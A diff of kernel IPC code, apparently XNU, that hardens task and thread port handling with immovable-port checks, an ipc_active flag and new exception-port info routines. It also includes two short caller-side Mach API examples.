+               if (kotype == IKOT_TASK_CONTROL) {
+                       *portp = task_get_non_substituted_self(task);
+                       goto out;
+               }
+       }
+
        switch (kotype) {
        case IKOT_TASK_CONTROL:
-               kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_CONTROL);
+               flavor = TASK_FLAVOR_CONTROL;
                break;
        case IKOT_TASK_READ:
-               kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_READ);
+               flavor = TASK_FLAVOR_READ;
                break;
        case IKOT_TASK_INSPECT:
-               kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_INSPECT);
+               flavor = TASK_FLAVOR_INSPECT;
                break;
        default:
                panic("strange kobject type");
-               break;
        }
 
+       kr = task_get_special_port_internal(task, which, portp, flavor);
+out:
        task_deallocate(task);
        return kr;
 }
@@ -1504,11 +1861,12 @@ port_allowed_with_task_flavor(
  *             Nothing locked.  If successful, consumes
  *             the supplied send right.
  *     Returns:
- *             KERN_SUCCESS            Changed the special port.
+ *             KERN_SUCCESS                Changed the special port.
  *             KERN_INVALID_ARGUMENT   The task is null.
- *             KERN_FAILURE            The task/space is dead.
+ *      KERN_INVALID_RIGHT      Port is marked as immovable.
+ *             KERN_FAILURE                The task/space is dead.
  *             KERN_INVALID_ARGUMENT   Invalid special port.
- *      KERN_NO_ACCESS         Restricted access to set port.
+ *      KERN_NO_ACCESS             Restricted access to set port.
  */
 
 kern_return_t
@@ -1525,6 +1883,10 @@ task_set_special_port(
                return KERN_NO_ACCESS;
        }
 
+       if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) {
+               return KERN_INVALID_RIGHT;
+       }
+
        switch (which) {
        case TASK_KERNEL_PORT:
        case TASK_HOST_PORT:
@@ -1576,7 +1938,7 @@ task_set_special_port_internal(
        }
 
        itk_lock(task);
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                rc = KERN_FAILURE;
                goto out_unlock;
        }
@@ -1649,7 +2011,8 @@ out:
  *             Nothing locked.  If successful, consumes
  *             the supplied rights and memory.
  *     Returns:
- *             KERN_SUCCESS            Stashed the port rights.
+ *             KERN_SUCCESS                Stashed the port rights.
+ *      KERN_INVALID_RIGHT      Port in array is marked immovable.
  *             KERN_INVALID_ARGUMENT   The task is null.
  *             KERN_INVALID_ARGUMENT   The task is dead.
  *             KERN_INVALID_ARGUMENT   The memory param is null.
@@ -1677,13 +2040,16 @@ mach_ports_register(
 
        for (i = 0; i < portsCnt; i++) {
                ports[i] = memory[i];
+               if (IP_VALID(ports[i]) && (ports[i]->ip_immovable_receive || ports[i]->ip_immovable_send)) {
+                       return KERN_INVALID_RIGHT;
+               }
        }
        for (; i < TASK_PORT_REGISTER_MAX; i++) {
                ports[i] = IP_NULL;
        }
 
        itk_lock(task);
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
                return KERN_INVALID_ARGUMENT;
        }
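
A caller-side sketch of mach_ports_register() with an ordinary movable right; per the new check above, an immovable right anywhere in the array is rejected with KERN_INVALID_RIGHT:

#include <mach/mach.h>

int
main(void)
{
    mach_port_t ports[1] = { MACH_PORT_NULL };
    kern_return_t kr;

    kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[0]);
    if (kr != KERN_SUCCESS) {
        return 1;
    }
    kr = mach_port_insert_right(mach_task_self(), ports[0], ports[0],
        MACH_MSG_TYPE_MAKE_SEND);
    if (kr != KERN_SUCCESS) {
        return 1;
    }

    /* Ordinary movable rights register fine. */
    kr = mach_ports_register(mach_task_self(), ports, 1);
    return (kr == KERN_SUCCESS) ? 0 : 1;
}
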
@@ -1759,7 +2125,7 @@ mach_ports_lookup(
        }
 
        itk_lock(task);
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
 
                kfree(memory, size);
@@ -1839,7 +2205,7 @@ task_conversion_eval(task_t caller, task_t victim)
  *     Conditions:
  *             Nothing locked, blocking OK.
  */
-task_t
+static task_t
 convert_port_to_locked_task(ipc_port_t port, boolean_t eval)
 {
        int try_failed_count = 0;
@@ -1886,7 +2252,7 @@ convert_port_to_locked_task(ipc_port_t port, boolean_t eval)
  *     Conditions:
  *             Nothing locked, blocking OK.
  */
-task_inspect_t
+static task_inspect_t
 convert_port_to_locked_task_inspect(ipc_port_t port)
 {
        int try_failed_count = 0;
@@ -1928,12 +2294,15 @@ convert_port_to_locked_task_inspect(ipc_port_t port)
  *     Conditions:
  *             Nothing locked, blocking OK.
  */
-task_read_t
-convert_port_to_locked_task_read(ipc_port_t port)
+static task_read_t
+convert_port_to_locked_task_read(
+       ipc_port_t port,
+       boolean_t  eval)
 {
        int try_failed_count = 0;
 
        while (IP_VALID(port)) {
+               task_t ct = current_task();
                task_read_t task;
 
                ip_lock(port);
@@ -1942,8 +2311,14 @@ convert_port_to_locked_task_read(ipc_port_t port)
                        ip_unlock(port);
                        return TASK_READ_NULL;
                }
-               task = (task_read_t)port->ip_kobject;
+               task = (task_read_t)ipc_kobject_get(port);
                assert(task != TASK_READ_NULL);
+
+               if (eval && task_conversion_eval(ct, task)) {
+                       ip_unlock(port);
+                       return TASK_READ_NULL;
+               }
+
                /*
                 * Normal lock ordering puts task_lock() before ip_lock().
                 * Attempt out-of-order locking here.
@@ -2174,7 +2549,8 @@ convert_port_to_task_inspect_locked(
 
 static task_read_t
 convert_port_to_task_read_locked(
-       ipc_port_t              port)
+       ipc_port_t port,
+       boolean_t  eval)
 {
        task_read_t task = TASK_READ_NULL;
 
@@ -2184,11 +2560,11 @@ convert_port_to_task_read_locked(
        if (ip_kotype(port) == IKOT_TASK_CONTROL ||
            ip_kotype(port) == IKOT_TASK_READ) {
                task_t ct = current_task();
-               task = (task_t)port->ip_kobject;
+               task = (task_read_t)ipc_kobject_get(port);
 
                assert(task != TASK_READ_NULL);
 
-               if (task_conversion_eval(ct, task)) {
+               if (eval && task_conversion_eval(ct, task)) {
                        return TASK_READ_NULL;
                }
 
@@ -2241,7 +2617,7 @@ convert_port_to_task_check_type(
                break;
        case IKOT_TASK_READ:
                if (at_most >= TASK_FLAVOR_READ) {
-                       task = convert_port_to_task_read(port);
+                       task = eval_check ? convert_port_to_task_read(port) : convert_port_to_task_read_no_eval(port);
                        if (task != TASK_READ_NULL) {
                                type = IKOT_TASK_READ;
                        }
@@ -2319,7 +2695,7 @@ convert_port_to_thread_check_type(
                break;
        case IKOT_THREAD_READ:
                if (at_most >= THREAD_FLAVOR_READ) {
-                       thread = convert_port_to_thread_read(port);
+                       thread = eval_check ? convert_port_to_thread_read(port) : convert_port_to_thread_read_no_eval(port);
                        if (thread != THREAD_READ_NULL) {
                                type = IKOT_THREAD_READ;
                        }
@@ -2387,7 +2763,7 @@ convert_port_to_space_check_type(
                break;
        case IKOT_TASK_READ:
                if (at_most >= TASK_FLAVOR_READ) {
-                       space = convert_port_to_space_read(port);
+                       space = eval_check ? convert_port_to_space_read(port) : convert_port_to_space_read_no_eval(port);
                        if (space != IPC_SPACE_READ_NULL) {
                                type = IKOT_TASK_READ;
                        }
@@ -2456,7 +2832,24 @@ convert_port_to_task_read(
        if (IP_VALID(port)) {
                ip_lock(port);
                if (ip_active(port)) {
-                       task = convert_port_to_task_read_locked(port);
+                       task = convert_port_to_task_read_locked(port, TRUE);
+               }
+               ip_unlock(port);
+       }
+
+       return task;
+}
+
+static task_read_t
+convert_port_to_task_read_no_eval(
+       ipc_port_t              port)
+{
+       task_read_t task = TASK_READ_NULL;
+
+       if (IP_VALID(port)) {
+               ip_lock(port);
+               if (ip_active(port)) {
+                       task = convert_port_to_task_read_locked(port, FALSE);
                }
                ip_unlock(port);
        }
@@ -2519,7 +2912,7 @@ convert_port_to_space_with_flavor(
                task = convert_port_to_locked_task(port, eval);
                break;
        case TASK_FLAVOR_READ:
-               task = convert_port_to_locked_task_read(port);
+               task = convert_port_to_locked_task_read(port, eval);
                break;
        case TASK_FLAVOR_INSPECT:
                task = convert_port_to_locked_task_inspect(port);
@@ -2565,6 +2958,13 @@ convert_port_to_space_read(
        return convert_port_to_space_with_flavor(port, TASK_FLAVOR_READ, TRUE);
 }
 
+static ipc_space_read_t
+convert_port_to_space_read_no_eval(
+       ipc_port_t      port)
+{
+       return convert_port_to_space_with_flavor(port, TASK_FLAVOR_READ, FALSE);
+}
+
 ipc_space_inspect_t
 convert_port_to_space_inspect(
        ipc_port_t      port)
@@ -2592,13 +2992,13 @@ convert_port_to_map_with_flavor(
 
        switch (flavor) {
        case TASK_FLAVOR_CONTROL:
-               task = convert_port_to_locked_task(port, TRUE);
+               task = convert_port_to_locked_task(port, TRUE); /* always eval */
                break;
        case TASK_FLAVOR_READ:
-               task = convert_port_to_locked_task_read(port);
+               task = convert_port_to_locked_task_read(port, TRUE); /* always eval */
                break;
        case TASK_FLAVOR_INSPECT:
-               task = convert_port_to_locked_task_inspect(port);
+               task = convert_port_to_locked_task_inspect(port); /* always no eval */
                break;
        default:
                task = TASK_NULL;
@@ -2628,7 +3028,7 @@ convert_port_to_map_with_flavor(
                pmap_require(map->pmap);
        }
 
-       vm_map_reference_swap(map);
+       vm_map_reference(map);
        task_unlock(task);
        return map;
 }
@@ -2758,7 +3158,7 @@ convert_port_to_thread_inspect_locked(
        if (ip_kotype(port) == IKOT_THREAD_CONTROL ||
            ip_kotype(port) == IKOT_THREAD_READ ||
            ip_kotype(port) == IKOT_THREAD_INSPECT) {
-               thread = (thread_inspect_t)port->ip_kobject;
+               thread = (thread_inspect_t)ipc_kobject_get(port);
                assert(thread != THREAD_INSPECT_NULL);
                thread_reference_internal((thread_t)thread);
        }
@@ -2794,7 +3194,8 @@ convert_port_to_thread_inspect(
  */
 static thread_read_t
 convert_port_to_thread_read_locked(
-       ipc_port_t              port)
+       ipc_port_t port,
+       boolean_t  eval)
 {
        thread_read_t thread = THREAD_READ_NULL;
 
@@ -2807,7 +3208,7 @@ convert_port_to_thread_read_locked(
                assert(thread != THREAD_READ_NULL);
 
                /* Use task conversion rules for thread control conversions */
-               if (task_conversion_eval(current_task(), thread->task) != KERN_SUCCESS) {
+               if (eval && task_conversion_eval(current_task(), thread->task) != KERN_SUCCESS) {
                        return THREAD_READ_NULL;
                }
 
@@ -2826,7 +3227,24 @@ convert_port_to_thread_read(
        if (IP_VALID(port)) {
                ip_lock(port);
                if (ip_active(port)) {
-                       thread = convert_port_to_thread_read_locked(port);
+                       thread = convert_port_to_thread_read_locked(port, TRUE);
+               }
+               ip_unlock(port);
+       }
+
+       return thread;
+}
+
+static thread_read_t
+convert_port_to_thread_read_no_eval(
+       ipc_port_t              port)
+{
+       thread_read_t thread = THREAD_READ_NULL;
+
+       if (IP_VALID(port)) {
+               ip_lock(port);
+               if (ip_active(port)) {
+                       thread = convert_port_to_thread_read_locked(port, FALSE);
                }
                ip_unlock(port);
        }
@@ -2853,16 +3271,13 @@ convert_thread_to_port_with_flavor(
 
        thread_mtx_lock(thread);
 
-       if (thread->ith_self[THREAD_FLAVOR_CONTROL] == IP_NULL) {
+       if (!thread->ipc_active) {
                goto exit;
        }
 
        if (flavor == THREAD_FLAVOR_CONTROL) {
-               port = ipc_port_make_send(thread->ith_self[flavor]);
+               port = ipc_port_make_send(thread->ith_thread_ports[flavor]);
        } else {
-               if (!thread->active) {
-                       goto exit;
-               }
                ipc_kobject_type_t kotype = (flavor == THREAD_FLAVOR_READ) ? IKOT_THREAD_READ : IKOT_THREAD_INSPECT;
                /*
                 * Claim a send right on the thread read/inspect port, and request a no-senders
@@ -2873,9 +3288,9 @@ convert_thread_to_port_with_flavor(
                 * send-once notification firing, and this is done under the thread mutex
                 * rather than with atomics.
                 */
-               (void)ipc_kobject_make_send_lazy_alloc_port(&thread->ith_self[flavor], (ipc_kobject_t)thread,
-                   kotype, false, 0);
-               port = thread->ith_self[flavor];
+               (void)ipc_kobject_make_send_lazy_alloc_port(&thread->ith_thread_ports[flavor], (ipc_kobject_t)thread,
+                   kotype, IPC_KOBJECT_ALLOC_IMMOVABLE_SEND, false, 0);
+               port = thread->ith_thread_ports[flavor];
        }
 
 exit:
@@ -2977,7 +3392,7 @@ port_name_to_task_read(
        if (MACH_PORT_VALID(name)) {
                kr = ipc_port_translate_send(current_space(), name, &kport);
                if (kr == KERN_SUCCESS) {
-                       tr = convert_port_to_task_read_locked(kport);
+                       tr = convert_port_to_task_read_locked(kport, TRUE);
                        ip_unlock(kport);
                }
        }
@@ -2989,8 +3404,7 @@ port_name_to_task_read(
  *     Purpose:
  *             Convert from a port name to a task reference
  *             A name of MACH_PORT_NULL is valid for the null task.
- *             It doesnt run the task_conversion_eval check if the port
- *             is of type IKOT_TASK_CONTROL.
+ *             Skips task_conversion_eval() during conversion.
  *     Conditions:
  *             Nothing locked.
  */
@@ -3005,48 +3419,13 @@ port_name_to_task_read_no_eval(
        if (MACH_PORT_VALID(name)) {
                kr = ipc_port_translate_send(current_space(), name, &kport);
                if (kr == KERN_SUCCESS) {
-                       switch (ip_kotype(kport)) {
-                       case IKOT_TASK_CONTROL:
-                               tr = convert_port_to_task_locked(kport, NULL, FALSE);
-                               break;
-                       case IKOT_TASK_READ:
-                               tr = convert_port_to_task_read_locked(kport);
-                               break;
-                       default:
-                               break;
-                       }
+                       tr = convert_port_to_task_read_locked(kport, FALSE);
                        ip_unlock(kport);
                }
        }
        return tr;
 }
 
-/*
- *     Routine:        port_name_to_task_inspect
- *     Purpose:
- *             Convert from a port name to a task reference
- *             A name of MACH_PORT_NULL is valid for the null task.
- *     Conditions:
- *             Nothing locked.
- */
-task_inspect_t
-port_name_to_task_inspect(
-       mach_port_name_t name)
-{
-       ipc_port_t kport;
-       kern_return_t kr;
-       task_inspect_t ti = TASK_INSPECT_NULL;
-
-       if (MACH_PORT_VALID(name)) {
-               kr = ipc_port_translate_send(current_space(), name, &kport);
-               if (kr == KERN_SUCCESS) {
-                       ti = convert_port_to_task_inspect_locked(kport);
-                       ip_unlock(kport);
-               }
-       }
-       return ti;
-}
-
 /*
  *     Routine:        port_name_to_task_name
  *     Purpose:
@@ -3118,10 +3497,14 @@ convert_task_to_port_with_flavor(
 
        itk_lock(task);
 
+       if (!task->ipc_active) {
+               goto exit;
+       }
+
        switch (flavor) {
        case TASK_FLAVOR_CONTROL:
        case TASK_FLAVOR_NAME:
-               port = ipc_port_make_send(task->itk_self[flavor]);
+               port = ipc_port_make_send(task->itk_task_ports[flavor]);
                break;
        /*
         * Claim a send right on the task read/inspect port, and request a no-senders
@@ -3133,14 +3516,11 @@ convert_task_to_port_with_flavor(
         */
        case TASK_FLAVOR_READ:
        case TASK_FLAVOR_INSPECT:
-               if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
-                       /* task is either disabled or terminated */
-                       goto exit;
-               }
                kotype = (flavor == TASK_FLAVOR_READ) ? IKOT_TASK_READ : IKOT_TASK_INSPECT;
-               (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_self[flavor],
-                   (ipc_kobject_t)task, kotype, true, OS_PTRAUTH_DISCRIMINATOR("task.itk_self"));
-               port = task->itk_self[flavor];
+               (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_task_ports[flavor],
+                   (ipc_kobject_t)task, kotype, IPC_KOBJECT_ALLOC_IMMOVABLE_SEND, true,
+                   OS_PTRAUTH_DISCRIMINATOR("task.itk_task_ports"));
+               port = task->itk_task_ports[flavor];
 
                break;
        }
@@ -3179,6 +3559,22 @@ convert_task_name_to_port(
        return convert_task_to_port_with_flavor(task, TASK_FLAVOR_NAME);
 }
 
+ipc_port_t
+convert_task_to_port_pinned(
+       task_t          task)
+{
+       ipc_port_t port = IP_NULL;
+
+       itk_lock(task);
+
+       if (task->ipc_active && task->itk_self != IP_NULL) {
+               port = ipc_port_make_send(task->itk_self);
+       }
+
+       itk_unlock(task);
+       task_deallocate(task);
+       return port;
+}
 /*
  *     Routine:        convert_task_suspend_token_to_port
  *     Purpose:
@@ -3218,6 +3614,22 @@ convert_task_suspension_token_to_port(
        return port;
 }
 
+ipc_port_t
+convert_thread_to_port_pinned(
+       thread_t                thread)
+{
+       ipc_port_t              port = IP_NULL;
+
+       thread_mtx_lock(thread);
+
+       if (thread->ipc_active && thread->ith_self != IP_NULL) {
+               port = ipc_port_make_send(thread->ith_self);
+       }
+
+       thread_mtx_unlock(thread);
+       thread_deallocate(thread);
+       return port;
+}
 /*
  *     Routine:        space_deallocate
  *     Purpose:
@@ -3377,7 +3789,7 @@ thread_set_exception_ports(
                }
        }
 
-       if (IP_VALID(new_port)) {        /* consume send right */
+       if (IP_VALID(new_port)) {         /* consume send right */
                ipc_port_release_send(new_port);
        }
 
@@ -3436,9 +3848,8 @@ task_set_exception_ports(
 
        itk_lock(task);
 
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
-
                return KERN_FAILURE;
        }
 
@@ -3471,7 +3882,7 @@ task_set_exception_ports(
                }
        }
 
-       if (IP_VALID(new_port)) {        /* consume send right */
+       if (IP_VALID(new_port)) {         /* consume send right */
                ipc_port_release_send(new_port);
        }
 
@@ -3620,7 +4031,7 @@ thread_swap_exception_ports(
                }
        }
 
-       if (IP_VALID(new_port)) {        /* consume send right */
+       if (IP_VALID(new_port)) {         /* consume send right */
                ipc_port_release_send(new_port);
        }
 
@@ -3681,7 +4092,7 @@ task_swap_exception_ports(
 
        itk_lock(task);
 
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
 #if CONFIG_MACF
                mac_exc_free_label(new_label);
@@ -3740,7 +4151,7 @@ task_swap_exception_ports(
                }
        }
 
-       if (IP_VALID(new_port)) {        /* consume send right */
+       if (IP_VALID(new_port)) {         /* consume send right */
                ipc_port_release_send(new_port);
        }
 
@@ -3767,27 +4178,21 @@ task_swap_exception_ports(
  *                                     Illegal mask bit set.
  *             KERN_FAILURE            The thread is dead.
  */
-kern_return_t
-thread_get_exception_ports(
-       thread_t                                        thread,
-       exception_mask_t                        exception_mask,
-       exception_mask_array_t          masks,
-       mach_msg_type_number_t          *CountCnt,
-       exception_port_array_t          ports,
-       exception_behavior_array_t      behaviors,
-       thread_state_flavor_array_t     flavors);
-
-kern_return_t
-thread_get_exception_ports(
-       thread_t                                        thread,
-       exception_mask_t                        exception_mask,
+static kern_return_t
+thread_get_exception_ports_internal(
+       thread_t                        thread,
+       exception_mask_t                exception_mask,
        exception_mask_array_t          masks,
        mach_msg_type_number_t          *CountCnt,
+       exception_port_info_array_t     ports_info,
        exception_port_array_t          ports,
        exception_behavior_array_t      behaviors,
        thread_state_flavor_array_t     flavors)
 {
-       unsigned int    i, j, count;
+       unsigned int count;
+       boolean_t info_only = (ports_info != NULL);
+       boolean_t dbg_ok = TRUE;
+       ipc_port_t port_ptrs[EXC_TYPES_COUNT]; /* pointers only, no send right held */
 
        if (thread == THREAD_NULL) {
                return KERN_INVALID_ARGUMENT;
@@ -3797,6 +4202,18 @@ thread_get_exception_ports(
                return KERN_INVALID_ARGUMENT;
        }
 
+       if (!info_only && !ports) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+#if !(DEVELOPMENT || DEBUG) && CONFIG_MACF
+       if (info_only && mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0) {
+               dbg_ok = TRUE;
+       } else {
+               dbg_ok = FALSE;
+       }
+#endif
+
        thread_mtx_lock(thread);
 
        if (!thread->active) {
@@ -3811,30 +4228,45 @@ thread_get_exception_ports(
                goto done;
        }
 
-       for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) {
+       for (int i = FIRST_EXCEPTION, j = 0; i < EXC_TYPES_COUNT; ++i) {
                if (exception_mask & (1 << i)) {
+                       ipc_port_t exc_port = thread->exc_actions[i].port;
+                       exception_behavior_t exc_behavior = thread->exc_actions[i].behavior;
+                       thread_state_flavor_t exc_flavor = thread->exc_actions[i].flavor;
+
                        for (j = 0; j < count; ++j) {
                                /*
                                 * search for an identical entry, if found
                                 * set corresponding mask for this exception.
                                 */
-                               if (thread->exc_actions[i].port == ports[j] &&
-                                   thread->exc_actions[i].behavior == behaviors[j] &&
-                                   thread->exc_actions[i].flavor == flavors[j]) {
+                               if (exc_port == port_ptrs[j] &&
+                                   exc_behavior == behaviors[j] &&
+                                   exc_flavor == flavors[j]) {
                                        masks[j] |= (1 << i);
                                        break;
                                }
                        }
 
-                       if (j == count) {
+                       if (j == count && count < *CountCnt) {
                                masks[j] = (1 << i);
-                               ports[j] = ipc_port_copy_send(thread->exc_actions[i].port);
-                               behaviors[j] = thread->exc_actions[i].behavior;
-                               flavors[j] = thread->exc_actions[i].flavor;
-                               ++count;
-                               if (count >= *CountCnt) {
-                                       break;
+                               port_ptrs[j] = exc_port;
+
+                               if (info_only) {
+                                       if (!dbg_ok || !IP_VALID(exc_port)) {
+                                               /* avoid taking port lock if !dbg_ok */
+                                               ports_info[j] = (ipc_info_port_t){ .iip_port_object = 0, .iip_receiver_object = 0 };
+                                       } else {
+                                               uintptr_t receiver;
+                                               (void)ipc_port_get_receiver_task(exc_port, &receiver);
+                                               ports_info[j].iip_port_object = (natural_t)VM_KERNEL_ADDRPERM(exc_port);
+                                               ports_info[j].iip_receiver_object = receiver ? (natural_t)VM_KERNEL_ADDRPERM(receiver) : 0;
+                                       }
+                               } else {
+                                       ports[j] = ipc_port_copy_send(exc_port);
                                }
+                               behaviors[j] = exc_behavior;
+                               flavors[j] = exc_flavor;
+                               ++count;
                        }
                }
        }
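
The de-duplication loop above serves the classic caller-side API as well as the new _info variant; a minimal sketch of the former, using only standard Mach calls:

#include <mach/mach.h>
#include <stdio.h>

int
main(void)
{
    exception_mask_t       masks[EXC_TYPES_COUNT];
    mach_port_t            ports[EXC_TYPES_COUNT];
    exception_behavior_t   behaviors[EXC_TYPES_COUNT];
    thread_state_flavor_t  flavors[EXC_TYPES_COUNT];
    mach_msg_type_number_t count = EXC_TYPES_COUNT;

    kern_return_t kr = task_get_exception_ports(mach_task_self(), EXC_MASK_ALL,
        masks, &count, ports, behaviors, flavors);
    if (kr != KERN_SUCCESS) {
        return 1;
    }
    for (mach_msg_type_number_t i = 0; i < count; i++) {
        printf("mask 0x%08x -> port 0x%x, behavior 0x%x, flavor %d\n",
            masks[i], ports[i], (unsigned)behaviors[i], flavors[i]);
        if (MACH_PORT_VALID(ports[i])) {
            (void)mach_port_deallocate(mach_task_self(), ports[i]);
        }
    }
    return 0;
}
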
@@ -3847,51 +4279,84 @@ done:
        return KERN_SUCCESS;
 }
 
+static kern_return_t
+thread_get_exception_ports(
+       thread_t                        thread,
+       exception_mask_t                exception_mask,
+       exception_mask_array_t          masks,
+       mach_msg_type_number_t          *CountCnt,
+       exception_port_array_t          ports,
+       exception_behavior_array_t      behaviors,
+       thread_state_flavor_array_t     flavors)
+{
+       return thread_get_exception_ports_internal(thread, exception_mask, masks, CountCnt,
+                  NULL, ports, behaviors, flavors);
+}
+
 kern_return_t
-thread_get_exception_ports_from_user(
+thread_get_exception_ports_info(
        mach_port_t                     port,
        exception_mask_t                exception_mask,
        exception_mask_array_t          masks,
-       mach_msg_type_number_t         *CountCnt,
-       exception_port_array_t          ports,
+       mach_msg_type_number_t          *CountCnt,
+       exception_port_info_array_t     ports_info,
        exception_behavior_array_t      behaviors,
        thread_state_flavor_array_t     flavors)
 {
        kern_return_t kr;
 
-       thread_t thread = convert_port_to_thread_check_type(port, NULL, THREAD_FLAVOR_CONTROL, FALSE);
+       thread_t thread = convert_port_to_thread_read_no_eval(port);
 
        if (thread == THREAD_NULL) {
                return KERN_INVALID_ARGUMENT;
        }
 
-       kr = thread_get_exception_ports(thread, exception_mask, masks, CountCnt, ports, behaviors, flavors);
+       kr = thread_get_exception_ports_internal(thread, exception_mask, masks, CountCnt,
+           ports_info, NULL, behaviors, flavors);
 
        thread_deallocate(thread);
        return kr;
 }
 
 kern_return_t
-task_get_exception_ports(
-       task_t                                          task,
-       exception_mask_t                        exception_mask,
+thread_get_exception_ports_from_user(
+       mach_port_t                     port,
+       exception_mask_t                exception_mask,
        exception_mask_array_t          masks,
-       mach_msg_type_number_t          *CountCnt,
+       mach_msg_type_number_t         *CountCnt,
        exception_port_array_t          ports,
        exception_behavior_array_t      behaviors,
-       thread_state_flavor_array_t     flavors);
+       thread_state_flavor_array_t     flavors)
+{
+       kern_return_t kr;
 
-kern_return_t
-task_get_exception_ports(
-       task_t                                          task,
-       exception_mask_t                        exception_mask,
+       thread_t thread = convert_port_to_thread_no_eval(port);
+
+       if (thread == THREAD_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       kr = thread_get_exception_ports(thread, exception_mask, masks, CountCnt, ports, behaviors, flavors);
+
+       thread_deallocate(thread);
+       return kr;
+}
+
+static kern_return_t
+task_get_exception_ports_internal(
+       task_t                          task,
+       exception_mask_t                exception_mask,
        exception_mask_array_t          masks,
        mach_msg_type_number_t          *CountCnt,
+       exception_port_info_array_t     ports_info,
        exception_port_array_t          ports,
        exception_behavior_array_t      behaviors,
        thread_state_flavor_array_t     flavors)
 {
-       unsigned int    i, j, count;
+       unsigned int count;
+       boolean_t info_only = (ports_info != NULL);
+       boolean_t dbg_ok = TRUE;
+       ipc_port_t port_ptrs[EXC_TYPES_COUNT]; /* pointers only, do not hold a right */
 
        if (task == TASK_NULL) {
                return KERN_INVALID_ARGUMENT;
@@ -3901,40 +4366,66 @@ task_get_exception_ports(
                return KERN_INVALID_ARGUMENT;
        }
 
+       if (!info_only && !ports) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+#if !(DEVELOPMENT || DEBUG) && CONFIG_MACF
+       if (info_only && mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0) {
+               dbg_ok = TRUE;
+       } else {
+               dbg_ok = FALSE;
+       }
+#endif
+
        itk_lock(task);
 
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
-
                return KERN_FAILURE;
        }
 
        count = 0;
 
-       for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) {
+       for (int i = FIRST_EXCEPTION, j = 0; i < EXC_TYPES_COUNT; ++i) {
                if (exception_mask & (1 << i)) {
+                       ipc_port_t exc_port = task->exc_actions[i].port;
+                       exception_behavior_t exc_behavior = task->exc_actions[i].behavior;
+                       thread_state_flavor_t exc_flavor = task->exc_actions[i].flavor;
+
                        for (j = 0; j < count; ++j) {
                                /*
                                 * search for an identical entry, if found
                                 * set corresponding mask for this exception.
                                 */
-                               if (task->exc_actions[i].port == ports[j] &&
-                                   task->exc_actions[i].behavior == behaviors[j] &&
-                                   task->exc_actions[i].flavor == flavors[j]) {
+                               if (exc_port == port_ptrs[j] &&
+                                   exc_behavior == behaviors[j] &&
+                                   exc_flavor == flavors[j]) {
                                        masks[j] |= (1 << i);
                                        break;
                                }
                        }
 
-                       if (j == count) {
+                       if (j == count && count < *CountCnt) {
                                masks[j] = (1 << i);
-                               ports[j] = ipc_port_copy_send(task->exc_actions[i].port);
-                               behaviors[j] = task->exc_actions[i].behavior;
-                               flavors[j] = task->exc_actions[i].flavor;
-                               ++count;
-                               if (count > *CountCnt) {
-                                       break;
+                               port_ptrs[j] = exc_port;
+
+                               if (info_only) {
+                                       if (!dbg_ok || !IP_VALID(exc_port)) {
+                                               /* avoid taking port lock if !dbg_ok */
+                                               ports_info[j] = (ipc_info_port_t){ .iip_port_object = 0, .iip_receiver_object = 0 };
+                                       } else {
+                                               uintptr_t receiver;
+                                               (void)ipc_port_get_receiver_task(exc_port, &receiver);
+                                               ports_info[j].iip_port_object = (natural_t)VM_KERNEL_ADDRPERM(exc_port);
+                                               ports_info[j].iip_receiver_object = receiver ? (natural_t)VM_KERNEL_ADDRPERM(receiver) : 0;
+                                       }
+                               } else {
+                                       ports[j] = ipc_port_copy_send(exc_port);
                                }
+                               behaviors[j] = exc_behavior;
+                               flavors[j] = exc_flavor;
+                               ++count;
                        }
                }
        }
@@ -3946,6 +4437,45 @@ task_get_exception_ports(
        return KERN_SUCCESS;
 }
 
+static kern_return_t
+task_get_exception_ports(
+       task_t                          task,
+       exception_mask_t                exception_mask,
+       exception_mask_array_t          masks,
+       mach_msg_type_number_t          *CountCnt,
+       exception_port_array_t          ports,
+       exception_behavior_array_t      behaviors,
+       thread_state_flavor_array_t     flavors)
+{
+       return task_get_exception_ports_internal(task, exception_mask, masks, CountCnt,
+                  NULL, ports, behaviors, flavors);
+}
+
+kern_return_t
+task_get_exception_ports_info(
+       mach_port_t                     port,
+       exception_mask_t                exception_mask,
+       exception_mask_array_t          masks,
+       mach_msg_type_number_t          *CountCnt,
+       exception_port_info_array_t     ports_info,
+       exception_behavior_array_t      behaviors,
+       thread_state_flavor_array_t     flavors)
+{
+       kern_return_t kr;
+
+       task_t task = convert_port_to_task_read_no_eval(port);
+
+       if (task == TASK_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       kr = task_get_exception_ports_internal(task, exception_mask, masks, CountCnt,
+           ports_info, NULL, behaviors, flavors);
+
+       task_deallocate(task);
+       return kr;
+}
+
 kern_return_t
 task_get_exception_ports_from_user(
        mach_port_t                     port,
@@ -3958,7 +4488,7 @@ task_get_exception_ports_from_user(
 {
        kern_return_t kr;
 
-       task_t task = convert_port_to_task_check_type(port, NULL, TASK_FLAVOR_CONTROL, FALSE);
+       task_t task = convert_port_to_task_no_eval(port);
 
        if (task == TASK_NULL) {
                return KERN_INVALID_ARGUMENT;
